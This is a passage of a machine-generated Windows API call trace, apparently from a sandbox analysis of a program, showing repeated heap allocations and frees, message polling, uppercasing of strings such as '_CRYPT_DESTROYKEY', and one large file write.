0x2e54fe8 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0232.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0232.894] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0232.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0232.894] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0232.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0232.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0232.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e80330 [0232.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0232.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e99a70 [0232.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e80330 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e99a70 | out: hHeap=0x970000) returned 1 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e99a70 [0232.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0232.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0232.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3aaf8 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0232.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0232.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2df58 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0232.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8ced0 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0232.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f213b8 | out: hHeap=0x970000) returned 1 [0232.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0232.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0232.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2e80330 [0232.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e99a70 | out: hHeap=0x970000) returned 1 [0232.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0232.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0232.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xcb98) returned 0x2f14818 [0232.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.960] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xcb98, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xcb98, lpOverlapped=0x0) returned 1 [0232.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.963] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0232.963] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0232.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.963] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0232.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0232.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 